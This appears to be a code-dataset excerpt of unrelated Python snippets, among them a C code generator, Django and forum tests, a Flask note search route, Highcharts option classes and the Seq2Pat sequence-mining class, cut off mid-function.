code stringlengths 281 23.7M |
|---|
class FrameProfilingRenderer():
def __init__(self, title: str='Pandas Profiling Report'):
self._title = title
def to_html(self, df: 'pd.DataFrame') -> str:
assert isinstance(df, pd.DataFrame)
import ydata_profiling
profile = ydata_profiling.ProfileReport(df, title=self._title)
return profile.to_html() |
()
('--prompt', type=str, default='The quick brown fox jumps over the lazy dog.', help='The prompt to give BERT.')
('--activation', type=str, default='fast_gelu', help='Activation function applied on BERT, currently only support gelu and fast_gelu')
('--graph_mode', type=bool, default=True, help='Use CUDA graph or not. (hipGraph is not supported yet)')
('--use_fp16_acc', type=bool, default=True, help='Use fp16 accumulation or not (TensorRT is using fp16_acc)')
('--verify', type=bool, default=True, help='Verify AIT outputs against PT')
def run_demo(prompt: str, activation: str, graph_mode: bool, use_fp16_acc: bool, verify: bool):
run_model(prompt, activation, graph_mode, use_fp16_acc, verify) |
class OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptions(Options):
def activeWhen(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsActivewhen':
return self._config_sub_data('activeWhen', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsActivewhen)
def language(self):
return self._config_get('en-US')
def language(self, text: str):
self._config(text, js_type=False)
def mapping(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsMapping':
return self._config_sub_data('mapping', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsMapping)
def pointGrouping(self) -> 'OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsPointgrouping':
return self._config_sub_data('pointGrouping', OptionPlotoptionsNetworkgraphSonificationDefaultspeechoptionsPointgrouping)
def preferredVoice(self):
return self._config_get(None)
def preferredVoice(self, text: str):
self._config(text, js_type=False)
def showPlayMarker(self):
return self._config_get(True)
def showPlayMarker(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('speech')
def type(self, text: str):
self._config(text, js_type=False) |
class CGenerator(object):
def __init__(self):
self.indent_level = 0
def _make_indent(self):
return (' ' * self.indent_level)
def visit(self, node):
method = ('visit_' + node.__class__.__name__)
return getattr(self, method, self.generic_visit)(node)
def generic_visit(self, node):
if (node is None):
return ''
else:
return ''.join((self.visit(c) for (c_name, c) in node.children()))
def visit_Constant(self, n):
return n.value
def visit_ID(self, n):
return n.name
def visit_ArrayRef(self, n):
arrref = self._parenthesize_unless_simple(n.name)
return (((arrref + '[') + self.visit(n.subscript)) + ']')
def visit_StructRef(self, n):
sref = self._parenthesize_unless_simple(n.name)
return ((sref + n.type) + self.visit(n.field))
def visit_FuncCall(self, n):
fref = self._parenthesize_unless_simple(n.name)
return (((fref + '(') + self.visit(n.args)) + ')')
def visit_UnaryOp(self, n):
operand = self._parenthesize_unless_simple(n.expr)
if (n.op == 'p++'):
return ('%s++' % operand)
elif (n.op == 'p--'):
return ('%s--' % operand)
elif (n.op == 'sizeof'):
return ('sizeof(%s)' % self.visit(n.expr))
else:
return ('%s%s' % (n.op, operand))
def visit_BinaryOp(self, n):
lval_str = self._parenthesize_if(n.left, (lambda d: (not self._is_simple_node(d))))
rval_str = self._parenthesize_if(n.right, (lambda d: (not self._is_simple_node(d))))
return ('%s %s %s' % (lval_str, n.op, rval_str))
def visit_Assignment(self, n):
rval_str = self._parenthesize_if(n.rvalue, (lambda n: isinstance(n, c_ast.Assignment)))
return ('%s %s %s' % (self.visit(n.lvalue), n.op, rval_str))
def visit_IdentifierType(self, n):
return ' '.join(n.names)
def _visit_expr(self, n):
if isinstance(n, c_ast.InitList):
return (('{' + self.visit(n)) + '}')
elif isinstance(n, c_ast.ExprList):
return (('(' + self.visit(n)) + ')')
else:
return self.visit(n)
def visit_Decl(self, n, no_type=False):
s = (n.name if no_type else self._generate_decl(n))
if n.bitsize:
s += (' : ' + self.visit(n.bitsize))
if n.init:
s += (' = ' + self._visit_expr(n.init))
return s
def visit_DeclList(self, n):
s = self.visit(n.decls[0])
if (len(n.decls) > 1):
s += (', ' + ', '.join((self.visit_Decl(decl, no_type=True) for decl in n.decls[1:])))
return s
def visit_Typedef(self, n):
s = ''
if n.storage:
s += (' '.join(n.storage) + ' ')
s += self._generate_type(n.type)
return s
def visit_Cast(self, n):
s = (('(' + self._generate_type(n.to_type)) + ')')
return ((s + ' ') + self._parenthesize_unless_simple(n.expr))
def visit_ExprList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_InitList(self, n):
visited_subexprs = []
for expr in n.exprs:
visited_subexprs.append(self._visit_expr(expr))
return ', '.join(visited_subexprs)
def visit_Enum(self, n):
s = 'enum'
if n.name:
s += (' ' + n.name)
if n.values:
s += ' {'
for (i, enumerator) in enumerate(n.values.enumerators):
s += enumerator.name
if enumerator.value:
s += (' = ' + self.visit(enumerator.value))
if (i != (len(n.values.enumerators) - 1)):
s += ', '
s += '}'
return s
def visit_FuncDef(self, n):
decl = self.visit(n.decl)
self.indent_level = 0
body = self.visit(n.body)
if n.param_decls:
knrdecls = ';\n'.join((self.visit(p) for p in n.param_decls))
return (((((decl + '\n') + knrdecls) + ';\n') + body) + '\n')
else:
return (((decl + '\n') + body) + '\n')
def visit_FileAST(self, n):
s = ''
for ext in n.ext:
if isinstance(ext, c_ast.FuncDef):
s += self.visit(ext)
else:
s += (self.visit(ext) + ';\n')
return s
def visit_Compound(self, n):
s = (self._make_indent() + '{\n')
self.indent_level += 2
if n.block_items:
s += ''.join((self._generate_stmt(stmt) for stmt in n.block_items))
self.indent_level -= 2
s += (self._make_indent() + '}\n')
return s
def visit_EmptyStatement(self, n):
return ';'
def visit_ParamList(self, n):
return ', '.join((self.visit(param) for param in n.params))
def visit_Return(self, n):
s = 'return'
if n.expr:
s += (' ' + self.visit(n.expr))
return (s + ';')
def visit_Break(self, n):
return 'break;'
def visit_Continue(self, n):
return 'continue;'
def visit_TernaryOp(self, n):
s = (self._visit_expr(n.cond) + ' ? ')
s += (self._visit_expr(n.iftrue) + ' : ')
s += self._visit_expr(n.iffalse)
return s
def visit_If(self, n):
s = 'if ('
if n.cond:
s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.iftrue, add_indent=True)
if n.iffalse:
s += (self._make_indent() + 'else\n')
s += self._generate_stmt(n.iffalse, add_indent=True)
return s
def visit_For(self, n):
s = 'for ('
if n.init:
s += self.visit(n.init)
s += ';'
if n.cond:
s += (' ' + self.visit(n.cond))
s += ';'
if n.next:
s += (' ' + self.visit(n.next))
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_While(self, n):
s = 'while ('
if n.cond:
s += self.visit(n.cond)
s += ')\n'
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_DoWhile(self, n):
s = 'do\n'
s += self._generate_stmt(n.stmt, add_indent=True)
s += (self._make_indent() + 'while (')
if n.cond:
s += self.visit(n.cond)
s += ');'
return s
def visit_Switch(self, n):
s = (('switch (' + self.visit(n.cond)) + ')\n')
s += self._generate_stmt(n.stmt, add_indent=True)
return s
def visit_Case(self, n):
s = (('case ' + self.visit(n.expr)) + ':\n')
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Default(self, n):
s = 'default:\n'
for stmt in n.stmts:
s += self._generate_stmt(stmt, add_indent=True)
return s
def visit_Label(self, n):
return ((n.name + ':\n') + self._generate_stmt(n.stmt))
def visit_Goto(self, n):
return (('goto ' + n.name) + ';')
def visit_EllipsisParam(self, n):
return '...'
def visit_Struct(self, n):
return self._generate_struct_union(n, 'struct')
def visit_Typename(self, n):
return self._generate_type(n.type)
def visit_Union(self, n):
return self._generate_struct_union(n, 'union')
def visit_NamedInitializer(self, n):
s = ''
for name in n.name:
if isinstance(name, c_ast.ID):
s += ('.' + name.name)
elif isinstance(name, c_ast.Constant):
s += (('[' + name.value) + ']')
s += (' = ' + self.visit(n.expr))
return s
def visit_FuncDecl(self, n):
return self._generate_type(n)
def _generate_struct_union(self, n, name):
s = ((name + ' ') + (n.name or ''))
if n.decls:
s += '\n'
s += self._make_indent()
self.indent_level += 2
s += '{\n'
for decl in n.decls:
s += self._generate_stmt(decl)
self.indent_level -= 2
s += (self._make_indent() + '}')
return s
def _generate_stmt(self, n, add_indent=False):
typ = type(n)
if add_indent:
self.indent_level += 2
indent = self._make_indent()
if add_indent:
self.indent_level -= 2
if (typ in (c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp, c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef, c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef, c_ast.ExprList)):
return ((indent + self.visit(n)) + ';\n')
elif (typ in (c_ast.Compound,)):
return self.visit(n)
else:
return ((indent + self.visit(n)) + '\n')
def _generate_decl(self, n):
s = ''
if n.funcspec:
s = (' '.join(n.funcspec) + ' ')
if n.storage:
s += (' '.join(n.storage) + ' ')
s += self._generate_type(n.type)
return s
def _generate_type(self, n, modifiers=[]):
typ = type(n)
if (typ == c_ast.TypeDecl):
s = ''
if n.quals:
s += (' '.join(n.quals) + ' ')
s += self.visit(n.type)
nstr = (n.declname if n.declname else '')
for (i, modifier) in enumerate(modifiers):
if isinstance(modifier, c_ast.ArrayDecl):
if ((i != 0) and isinstance(modifiers[(i - 1)], c_ast.PtrDecl)):
nstr = (('(' + nstr) + ')')
nstr += (('[' + self.visit(modifier.dim)) + ']')
elif isinstance(modifier, c_ast.FuncDecl):
if ((i != 0) and isinstance(modifiers[(i - 1)], c_ast.PtrDecl)):
nstr = (('(' + nstr) + ')')
nstr += (('(' + self.visit(modifier.args)) + ')')
elif isinstance(modifier, c_ast.PtrDecl):
if modifier.quals:
nstr = ('* %s %s' % (' '.join(modifier.quals), nstr))
else:
nstr = ('*' + nstr)
if nstr:
s += (' ' + nstr)
return s
elif (typ == c_ast.Decl):
return self._generate_decl(n.type)
elif (typ == c_ast.Typename):
return self._generate_type(n.type)
elif (typ == c_ast.IdentifierType):
return (' '.join(n.names) + ' ')
elif (typ in (c_ast.ArrayDecl, c_ast.PtrDecl, c_ast.FuncDecl)):
return self._generate_type(n.type, (modifiers + [n]))
else:
return self.visit(n)
def _parenthesize_if(self, n, condition):
s = self._visit_expr(n)
if condition(n):
return (('(' + s) + ')')
else:
return s
def _parenthesize_unless_simple(self, n):
return self._parenthesize_if(n, (lambda d: (not self._is_simple_node(d))))
def _is_simple_node(self, n):
return isinstance(n, (c_ast.Constant, c_ast.ID, c_ast.ArrayRef, c_ast.StructRef, c_ast.FuncCall)) |
class OptionSeriesAreasplinerangeDataDatalabels(Options):
def align(self):
return self._config_get('center')
def align(self, text: str):
self._config(text, js_type=False)
def allowOverlap(self):
return self._config_get(False)
def allowOverlap(self, flag: bool):
self._config(flag, js_type=False)
def animation(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsAnimation':
return self._config_sub_data('animation', OptionSeriesAreasplinerangeDataDatalabelsAnimation)
def backgroundColor(self):
return self._config_get(None)
def backgroundColor(self, text: str):
self._config(text, js_type=False)
def borderColor(self):
return self._config_get(None)
def borderColor(self, text: str):
self._config(text, js_type=False)
def borderRadius(self):
return self._config_get(0)
def borderRadius(self, num: float):
self._config(num, js_type=False)
def borderWidth(self):
return self._config_get(0)
def borderWidth(self, num: float):
self._config(num, js_type=False)
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def crop(self):
return self._config_get(True)
def crop(self, flag: bool):
self._config(flag, js_type=False)
def defer(self):
return self._config_get(True)
def defer(self, flag: bool):
self._config(flag, js_type=False)
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def filter(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsFilter':
return self._config_sub_data('filter', OptionSeriesAreasplinerangeDataDatalabelsFilter)
def format(self):
return self._config_get('point.value')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get(None)
def formatter(self, value: Any):
self._config(value, js_type=False)
def inside(self):
return self._config_get(None)
def inside(self, flag: bool):
self._config(flag, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, flag: bool):
self._config(flag, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def overflow(self):
return self._config_get('justify')
def overflow(self, text: str):
self._config(text, js_type=False)
def padding(self):
return self._config_get(5)
def padding(self, num: float):
self._config(num, js_type=False)
def position(self):
return self._config_get('center')
def position(self, text: str):
self._config(text, js_type=False)
def rotation(self):
return self._config_get(0)
def rotation(self, num: float):
self._config(num, js_type=False)
def shadow(self):
return self._config_get(False)
def shadow(self, flag: bool):
self._config(flag, js_type=False)
def shape(self):
return self._config_get('square')
def shape(self, text: str):
self._config(text, js_type=False)
def style(self):
return self._config_get(None)
def style(self, value: Any):
self._config(value, js_type=False)
def textPath(self) -> 'OptionSeriesAreasplinerangeDataDatalabelsTextpath':
return self._config_sub_data('textPath', OptionSeriesAreasplinerangeDataDatalabelsTextpath)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False)
def verticalAlign(self):
return self._config_get('bottom')
def verticalAlign(self, text: str):
self._config(text, js_type=False)
def x(self):
return self._config_get(0)
def x(self, num: float):
self._config(num, js_type=False)
def xHigh(self):
return self._config_get(0)
def xHigh(self, num: float):
self._config(num, js_type=False)
def xLow(self):
return self._config_get(0)
def xLow(self, num: float):
self._config(num, js_type=False)
def y(self):
return self._config_get(0)
def y(self, num: float):
self._config(num, js_type=False)
def yHigh(self):
return self._config_get(0)
def yHigh(self, num: float):
self._config(num, js_type=False)
def yLow(self):
return self._config_get(0)
def yLow(self, num: float):
self._config(num, js_type=False)
def zIndex(self):
return self._config_get(6)
def zIndex(self, num: float):
self._config(num, js_type=False) |
.external
.parametrize('generate_type, generate_target', [('systems', 'aws'), ('systems', 'okta'), ('datasets', 'db'), ('datasets', 'bigquery'), ('datasets', 'dynamodb')])
def test_generate(test_config: FidesConfig, generate_type: str, generate_target: str, test_client: TestClient) -> None:
data = {'organization_key': 'default_organization', 'generate': {'config': EXTERNAL_CONFIG_BODY[generate_target], 'target': generate_target, 'type': generate_type}}
response = test_client.post(((test_config.cli.server_url + API_PREFIX) + '/generate/'), headers=test_config.user.auth_header, data=dumps(data))
generate_response = GenerateResponse.parse_raw(response.text)
assert (len(generate_response.generate_results) > 0)
assert (response.status_code == 200) |
def pytest_configure(config):
from django.conf import settings
settings.configure(DEBUG_PROPAGATE_EXCEPTIONS=True, DATABASES={'default': {'ENGINE': 'django.db.backends.sqlite3', 'NAME': ':memory:'}}, SITE_ID=1, SECRET_KEY='not very secret in tests', USE_I18N=True, STATIC_URL='/static/', ROOT_URLCONF='tests.urls', TEMPLATES=[{'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, 'OPTIONS': {'debug': True}}], MIDDLEWARE=('django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware'), INSTALLED_APPS=('django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.sites', 'django.contrib.staticfiles', 'rest_framework', 'rest_framework.authtoken'), PASSWORD_HASHERS=('django.contrib.auth.hashers.MD5PasswordHasher',))
django.setup() |
class EspSecureHSMTestCase():
def setup_class(self):
self.cleanup_files = []
def teardown_class(self):
for f in self.cleanup_files:
f.close()
def _open(self, image_file):
f = open(os.path.join(TEST_DIR, 'secure_images', image_file), 'rb')
self.cleanup_files.append(f)
return f
def get_pkcs11lib(self):
if (sys.maxsize > (2 ** 32)):
WINDOWS_SOFTHSM = 'c:/SoftHSM2/lib/softhsm2-x64.dll'
else:
WINDOWS_SOFTHSM = 'c:/SoftHSM2/lib/softhsm2.dll'
LIBS = ['/usr/local/lib/softhsm/libsofthsm2.so', '/usr/lib/softhsm/libsofthsm2.so', '/usr/lib/x86_64-linux-gnu/softhsm/libsofthsm2.so', WINDOWS_SOFTHSM]
for lib in LIBS:
if os.path.isfile(lib):
print('Using lib:', lib)
return lib
return None
def softhsm_setup_token(self, filename, token_label):
self.pkcs11_lib = self.get_pkcs11lib()
if (self.pkcs11_lib is None):
print('PKCS11 lib does not exist')
sys.exit((- 1))
lib = pkcs11.lib(self.pkcs11_lib)
token = lib.get_token(token_label=token_label)
slot = token.slot.slot_id
session = token.open(rw=True, user_pin=TOKEN_PIN)
keyID = (0,)
label = 'Private Key for Digital Signature'
label_pubkey = 'Public Key for Digital Signature'
pubTemplate = [(pkcs11.Attribute.CLASS, pkcs11.constants.ObjectClass.PUBLIC_KEY), (pkcs11.Attribute.TOKEN, True), (pkcs11.Attribute.PRIVATE, False), (pkcs11.Attribute.MODULUS_BITS, 3072), (pkcs11.Attribute.PUBLIC_EXPONENT, (1, 0, 1)), (pkcs11.Attribute.ENCRYPT, True), (pkcs11.Attribute.VERIFY, True), (pkcs11.Attribute.VERIFY_RECOVER, True), (pkcs11.Attribute.WRAP, True), (pkcs11.Attribute.LABEL, label_pubkey), (pkcs11.Attribute.ID, keyID)]
privTemplate = [(pkcs11.Attribute.CLASS, pkcs11.constants.ObjectClass.PRIVATE_KEY), (pkcs11.Attribute.TOKEN, True), (pkcs11.Attribute.PRIVATE, True), (pkcs11.Attribute.DECRYPT, True), (pkcs11.Attribute.SIGN, True), (pkcs11.Attribute.SENSITIVE, True), (pkcs11.Attribute.SIGN_RECOVER, True), (pkcs11.Attribute.LABEL, label), (pkcs11.Attribute.UNWRAP, True), (pkcs11.Attribute.ID, keyID)]
session.generate_keypair(pkcs11.KeyType.RSA, 3072, private_template=privTemplate, public_template=pubTemplate)
configfile = os.path.join(TEST_DIR, 'secure_images', filename)
config = configparser.ConfigParser()
section = 'hsm_config'
config.add_section(section)
config.set(section, 'pkcs11_lib', self.pkcs11_lib)
config.set(section, 'credentials', TOKEN_PIN)
config.set(section, 'slot', str(slot))
config.set(section, 'label', label)
config.set(section, 'label_pubkey', label_pubkey)
with open(configfile, 'w') as c:
config.write(c)
session.close() |
def on_window_focus(layouts: Layouts, state: State):
def _on_window_focus(i3l: Connection, e: WindowEvent):
logger.debug(f'[ipc] window focus event - container:{e.container.id}:{e.container.window}')
context = state.sync_context(i3l)
layout = layouts.get(context.workspace.name)
focused_container = i3l.get_tree().find_focused()
if (not is_layout_container(focused_container)):
logger.debug(' [ipc] window focus event - not a layout container')
return
previous_mark = Mark.previous()
current_mark = Mark.current()
i3l.command(f'[con_mark="{current_mark}"] mark --add {previous_mark}')
i3l.command(f'[con_id="{focused_container.id}"] mark --add {current_mark}')
if (layout is None):
logger.debug(' [ipc] window focus event - no workspace layout')
return
if (layout.name != LayoutName.AUTOSPLIT):
logger.debug(' [ipc] window focus event - workspace layout not autosplit')
return
logger.debug(' [ipc] window focus event - update layout')
layout.update(context, focused_container)
return _on_window_focus |
def train_function(n_epochs: int, distributed_env_cls) -> PPO:
envs = distributed_env_cls([(lambda : GymMazeEnv(env='CartPole-v0')) for _ in range(2)])
eval_env = distributed_env_cls([(lambda : GymMazeEnv(env='CartPole-v0')) for _ in range(2)], logging_prefix='eval')
env = GymMazeEnv(env='CartPole-v0')
distribution_mapper = DistributionMapper(action_space=env.action_space, distribution_mapper_config={})
policies = {0: FlattenConcatPolicyNet({'observation': (4,)}, {'action': (2,)}, hidden_units=[16], non_lin=nn.Tanh)}
critics = {0: FlattenConcatStateValueNet({'observation': (4,)}, hidden_units=[16], non_lin=nn.Tanh)}
algorithm_config = PPOAlgorithmConfig(n_epochs=n_epochs, epoch_length=2, patience=10, critic_burn_in_epochs=0, n_rollout_steps=20, lr=0.0005, gamma=0.98, gae_lambda=1.0, policy_loss_coef=1.0, value_loss_coef=0.5, entropy_coef=0.0, max_grad_norm=1.0, device='cpu', batch_size=10, n_optimization_epochs=1, clip_range=0.2, rollout_evaluator=RolloutEvaluator(eval_env=eval_env, n_episodes=1, model_selection=None, deterministic=True))
model = TorchActorCritic(policy=TorchPolicy(networks=policies, distribution_mapper=distribution_mapper, device=algorithm_config.device), critic=TorchSharedStateCritic(networks=critics, obs_spaces_dict=env.observation_spaces_dict, device=algorithm_config.device, stack_observations=False), device=algorithm_config.device)
ppo = PPO(rollout_generator=RolloutGenerator(envs), algorithm_config=algorithm_config, evaluator=algorithm_config.rollout_evaluator, model=model, model_selection=None)
ppo.train()
return ppo |
def test_input_stream():
with open('tests/lipsum.txt', 'r') as fin:
data = fin.read()
runner = CliRunner()
result = runner.invoke(cli, ['-s', '0'], input=data)
assert (result.exit_code == 0)
lines = iter(result.output.split('\r'))
filt = []
(prev, curr) = (None, next(lines))
while curr:
if (prev and (len(curr) < len(prev))):
filt.append(prev)
try:
(prev, curr) = (curr, next(lines))
except StopIteration:
curr = None
for line in filt:
assert (line.split('\n')[0] in data) |
('/search')
def search_notes():
notes = []
if current_user.is_authenticated:
query = request.args.get('query', None)
if (query is not None):
query = ('%%%s%%' % str(query))
notes = Note.query.filter(Note.body.like(query), (Note.owner_id == current_user.id)).limit(100).all()
return render_template('search.html', notes=notes, current_user=current_user) |
class Value(KqlNode):
__slots__ = ('value',)
precedence = 1
def __init__(self, value):
self.value = value
def from_python(cls, value):
if (value is None):
return Null()
elif (is_string(value) and (('*' in value) or ('?' in value))):
return Wildcard(value)
elif isinstance(value, bool):
return Boolean(value)
elif is_number(value):
return Number(value)
elif is_string(value):
return String(value)
else:
raise EqlCompileError('Unknown type {} for value {}'.format(type(value).__name__, value)) |
def regtest_generate_nblocks(nblocks: int, address: str) -> List:
payload1 = json.dumps({'jsonrpc': '2.0', 'method': 'generatetoaddress', 'params': [nblocks, address], 'id': 0})
result = requests.post(BITCOIN_NODE_URI, data=payload1)
result.raise_for_status()
block_hashes = []
for block_hash in result.json()['result']:
block_hashes.append(block_hash)
logger.debug('newly mined blockhash: %s', block_hash)
logger.debug("mined %s new blocks (funds to address=%s). use the 'regtest_topup_account' method to fund your account", nblocks, address)
return block_hashes |
class TestTopicSubscriptionListView(BaseClientTestCase):
(autouse=True)
def setup(self):
self.u1 = UserFactory.create()
self.g1 = GroupFactory.create()
self.u1.groups.add(self.g1)
self.user.groups.add(self.g1)
self.perm_handler = PermissionHandler()
self.top_level_cat_1 = create_category_forum()
self.forum_1 = create_forum(parent=self.top_level_cat_1)
self.forum_2 = create_forum(parent=self.top_level_cat_1)
self.forum_3 = create_forum(parent=self.top_level_cat_1)
self.topic_1 = create_topic(forum=self.forum_2, poster=self.u1)
PostFactory.create(topic=self.topic_1, poster=self.u1)
PostFactory.create(topic=self.topic_1, poster=self.user)
self.topic_2 = create_topic(forum=self.forum_1, poster=self.user)
PostFactory.create(topic=self.topic_2, poster=self.user)
PostFactory.create(topic=self.topic_2, poster=self.u1)
self.topic_3 = create_topic(forum=self.forum_2, poster=self.u1)
PostFactory.create(topic=self.topic_3, poster=self.u1)
self.topic_4 = create_topic(forum=self.forum_2, poster=self.user)
PostFactory.create(topic=self.topic_4, poster=self.user)
assign_perm('can_read_forum', self.g1, self.top_level_cat_1)
assign_perm('can_read_forum', self.g1, self.forum_1)
assign_perm('can_read_forum', self.g1, self.forum_2)
def test_browsing_works(self):
correct_url = reverse('forum_member:user_subscriptions')
response = self.client.get(correct_url, follow=True)
assert (response.status_code == 200)
def test_cannot_be_browsed_by_anonymous_users(self):
correct_url = reverse('forum_member:user_subscriptions')
self.client.logout()
response = self.client.get(correct_url, follow=False)
assert (response.status_code == 302)
def test_displays_only_topics_the_user_is_subscribed_to(self):
self.user.topic_subscriptions.add(self.topic_2)
correct_url = reverse('forum_member:user_subscriptions')
response = self.client.get(correct_url, follow=True)
assert (response.status_code == 200)
assert (list(response.context_data['topics']) == [self.topic_2]) |
class Seq2Pat():
def __init__(self, sequences: List[list], max_span: Optional[int]=10, batch_size=None, discount_factor=0.2, n_jobs=2, seed=_Constants.default_seed):
validate_sequences(sequences)
validate_max_span(max_span)
validate_batch_args(batch_size, discount_factor, n_jobs, seed)
self._sequences: List[list] = sequences
self._is_string = isinstance(sequences[0][0], str)
if self._is_string:
(self._str_to_int, self._int_to_str) = item_map(self.sequences)
self._sequences = string_to_int(self._str_to_int, self.sequences)
self._num_rows = len(self.sequences)
self._max_num_columns = get_max_column_size(self.sequences)
self._max_value = get_max_value(self.sequences)
self.attr_to_cts: Dict[(Attribute, Dict[(str, _Constraint)])] = dict()
self._cython_imp = None
if max_span:
index_attr = Attribute([[i for i in range(len(seq))] for seq in sequences])
self.add_constraint((1 <= index_attr.span() <= (max_span - 1)))
if ((not batch_size) and (self._num_rows > _Constants.dynamic_batch_threshold)):
self.batch_size = _Constants.default_batch_size
else:
self.batch_size = batch_size
self.discount_factor = discount_factor
self.n_jobs = n_jobs
self.seed = seed
self._rng = np.random.default_rng(self.seed)
def sequences(self) -> List[List]:
return self._sequences
def add_constraint(self, constraint: _BaseConstraint) -> _BaseConstraint:
attr_id = constraint.attribute
ct_id = constraint.__class__.__name__
if (attr_id not in self.attr_to_cts):
self.attr_to_cts[attr_id] = dict()
if (ct_id in self.attr_to_cts[attr_id]):
raise TypeError((ct_id + ' constraint is already defined on this attribute.'))
check_true(check_sequence_feature_same_length(self.sequences, constraint.attribute.values), ValueError('Each sequence should match given attributes in event length.'))
self.attr_to_cts[attr_id][ct_id] = constraint
return constraint
def remove_constraint(self, constraint: _BaseConstraint) -> NoReturn:
attribute_id = constraint.attribute
constraint_id = constraint.__class__.__name__
try:
del self.attr_to_cts[attribute_id][constraint_id]
if (len(self.attr_to_cts[attribute_id]) == 0):
del self.attr_to_cts[attribute_id]
except KeyError:
raise KeyError((('No ' + constraint_id) + ' constraint to remove on this attribute.'))
def _run_thread(self, min_frequency, q):
self._cython_imp = self._get_cython_imp(min_frequency)
q.put(self._cython_imp.mine())
def get_patterns(self, min_frequency: Num) -> List[list]:
check_true((self._num_rows >= 1), ValueError('Sequences should not be empty.'))
validate_min_frequency(self._num_rows, min_frequency)
if (not self.batch_size):
q = Queue()
thread = Process(target=self._run_thread, args=(min_frequency, q))
thread.start()
patterns = q.get()
thread.join()
else:
if isinstance(min_frequency, int):
min_frequency = (float(min_frequency) / len(self.sequences))
patterns = self._get_patterns_batch(min_frequency)
if self._is_string:
patterns = int_to_string(self._int_to_str, patterns)
patterns_sorted = sort_pattern(patterns)
gc.collect()
return patterns_sorted
def _get_patterns_batch(self, min_frequency: float) -> List[list]:
(sequences, attr_to_cs) = self._shuffle_data()
n_sequences = len(sequences)
num_chunks = (n_sequences // self.batch_size)
if ((n_sequences % self.batch_size) > 0):
num_chunks += 1
batch_patterns = Parallel(n_jobs=self.n_jobs, require='sharedmem')((delayed(self._mining_batch)(i, sequences, attr_to_cs, min_frequency) for i in range(0, num_chunks)))
min_row_count = int((n_sequences * min_frequency))
agg_patterns = aggregate_patterns(batch_patterns, min_row_count)
return agg_patterns
def _shuffle_data(self) -> Tuple[(List[List], Dict[(Attribute, Dict[(str, _Constraint)])])]:
indices = list(range(len(self.sequences)))
self._rng.shuffle(indices)
shuffled_sequences = [self.sequences[i] for i in indices]
shuffled_attr_to_cts = deepcopy(self.attr_to_cts)
for attr in shuffled_attr_to_cts:
for cs in shuffled_attr_to_cts[attr]:
old_constraint = shuffled_attr_to_cts[attr][cs]
new_constraint = deepcopy(old_constraint)
shuffled_values = [old_constraint.attribute.values[i] for i in indices]
new_constraint.attribute._set_values(shuffled_values)
shuffled_attr_to_cts[attr][cs] = new_constraint
return (shuffled_sequences, shuffled_attr_to_cts)
def _mining_batch(self, chunk_ind: int, sequences: List[List], attr_to_cs: Dict[(Attribute, Dict[(str, _Constraint)])], min_frequency: float) -> List[List]:
batch_sequences = sequences[(chunk_ind * self.batch_size):((chunk_ind + 1) * self.batch_size)]
batch_seq2pat = Seq2Pat(batch_sequences, max_span=None, batch_size=None)
for attr in attr_to_cs:
for cs in attr_to_cs[attr]:
old_constraint = attr_to_cs[attr][cs]
new_constraint = deepcopy(old_constraint)
new_constraint.attribute._set_values(old_constraint.attribute.values[(chunk_ind * self.batch_size):((chunk_ind + 1) * self.batch_size)])
batch_seq2pat.add_constraint(new_constraint)
adjusted_min_frequency = update_min_frequency(len(batch_sequences), min_frequency, self.discount_factor)
return batch_seq2pat.get_patterns(adjusted_min_frequency)
def _get_cython_imp(self, min_frequency) -> stp.PySeq2pat:
cython_imp = stp.PySeq2pat()
params = {_Constants.lgap: [], _Constants.ugap: [], _Constants.lavr: [], _Constants.uavr: [], _Constants.lspn: [], _Constants.uspn: [], _Constants.lmed: [], _Constants.umed: [], _Constants.ugapi: [], _Constants.lgapi: [], _Constants.uspni: [], _Constants.lspni: [], _Constants.uavri: [], _Constants.lavri: [], _Constants.umedi: [], _Constants.lmedi: [], _Constants.num_minmax: [], _Constants.num_avr: [], _Constants.num_med: [], _Constants.tot_gap: [], _Constants.tot_spn: [], _Constants.tot_avr: [], _Constants.num_att: 0, _Constants.items: self.sequences, _Constants.attrs: [], _Constants.M: self._max_num_columns, _Constants.N: self._num_rows, _Constants.L: self._max_value, _Constants.max_attrs: [], _Constants.min_attrs: []}
for (attribute, constraints) in self.attr_to_cts.items():
params[_Constants.num_att] += 1
params[_Constants.num_minmax].append(0)
params[_Constants.num_avr].append(0)
params[_Constants.num_med].append(0)
params[_Constants.max_attrs].append(attribute._max)
params[_Constants.min_attrs].append(attribute._min)
params[_Constants.attrs].append(attribute.values)
for (constraint_type, constraint) in constraints.items():
if isinstance(constraint, _Constraint.Average):
self._update_average_params(params, constraint)
if isinstance(constraint, _Constraint.Gap):
